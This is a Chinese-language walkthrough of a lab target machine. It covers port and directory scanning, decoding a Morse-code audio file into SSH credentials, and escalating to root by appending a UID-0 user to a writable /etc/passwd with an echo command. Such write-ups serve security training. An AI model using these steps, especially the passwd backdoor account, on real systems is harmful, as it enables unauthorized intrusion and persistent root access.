滲透思路：

nmap掃描----gobuster掃描網站目錄----在線解碼摩斯電碼，得到ssh用戶名密碼----/etc/passwd寫入用戶提權

環境信息：

靶機：192.168.101.77

攻擊機：192.168.101.34

具體步驟：

1、nmap掃描

sudo nmap -sV -sC -p- 192.168.101.77

2、dirb掃描網站目錄（兔子洞）

​dirb http://192.168.101.77

發現http://192.168.101.77/robots.txt

（下面是一個兔子洞）

瀏覽器訪問http://192.168.101.77/robots.txt，發現/find_me

瀏覽器訪問/find_me，點擊find_me.html，並查看網頁源代碼

view-source:http://192.168.101.77/find_me/find_me.html

拉到最下面發現一大段注釋（沒啥用就不複制粘貼了）

base64解碼之後還是一堆沒有意義的亂碼，此路不通

3、gobuster掃描網站目錄

​gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

掃描到/bulma

http://192.168.101.77/bulma/是個目錄，裏面有個文件hahahaha.wav

下載下來聽了一下，感覺是摩斯電碼

4、在線解碼摩斯電碼，得到ssh用戶名密碼

找了個在線翻譯器：Morse Code Audio Decoder | Morse Code World

按upload上傳hahahaha.wav，然後按play，自動轉為文本信息

得到的結果是

USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

以用戶名trunks，密碼u$3r進行ssh登錄

ssh [email protected]

5、/etc/passwd寫入新用戶提權

查看/home/trunks/.bash_history，發現其中有向/etc/passwd寫入新用戶的操作

查看/etc/passwd的文件權限

ls -al /etc/passwd

發現trunks用戶有寫權限

參考/home/trunks/.bash_history中的命令，先用perl生成加密的用戶密碼

perl -le 'print crypt("123456","addedsalt")'

以上命令中，用戶的明文密碼為123456

然後再將新用戶test寫入/etc/passwd

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

最後切換到test用戶，輸入密碼123456，獲得root權限，並在/root目錄下找到root.txt

su - test